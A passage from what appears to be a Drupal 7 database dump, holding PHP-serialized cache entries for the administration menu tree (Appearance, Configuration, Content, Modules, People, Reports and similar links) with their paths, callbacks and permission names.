errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423775242,1),('links:management:tree-data:en:6de0a563149b9a89b1a4f19f6803e76773c18df9a3a53f793375398de4a3877c','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:13:{i:42;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"42\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/fields\";s:11:\"router_path\";s:20:\"admin/reports/fields\";s:10:\"link_title\";s:10:\"Field list\";s:7:\"options\";s:89:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Overview of fields on all entity types.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"42\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:20:\"field_ui_fields_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/fields\";s:5:\"title\";s:10:\"Field list\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:39:\"Overview of fields on all entity types.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:50;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"50\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/dblog\";s:11:\"router_path\";s:19:\"admin/reports/dblog\";s:10:\"link_title\";s:19:\"Recent log messages\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View events that have recently been logged.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"50\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:14:\"dblog_overview\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/dblog\";s:5:\"title\";s:19:\"Recent log messages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View events that have recently been logged.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:55;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"55\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/status\";s:11:\"router_path\";s:20:\"admin/reports/status\";s:10:\"link_title\";s:13:\"Status report\";s:7:\"options\";s:124:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-60\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"55\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"system_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/status\";s:5:\"title\";s:13:\"Status report\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:74:\"Get a status report about your site\'s operation and any detected 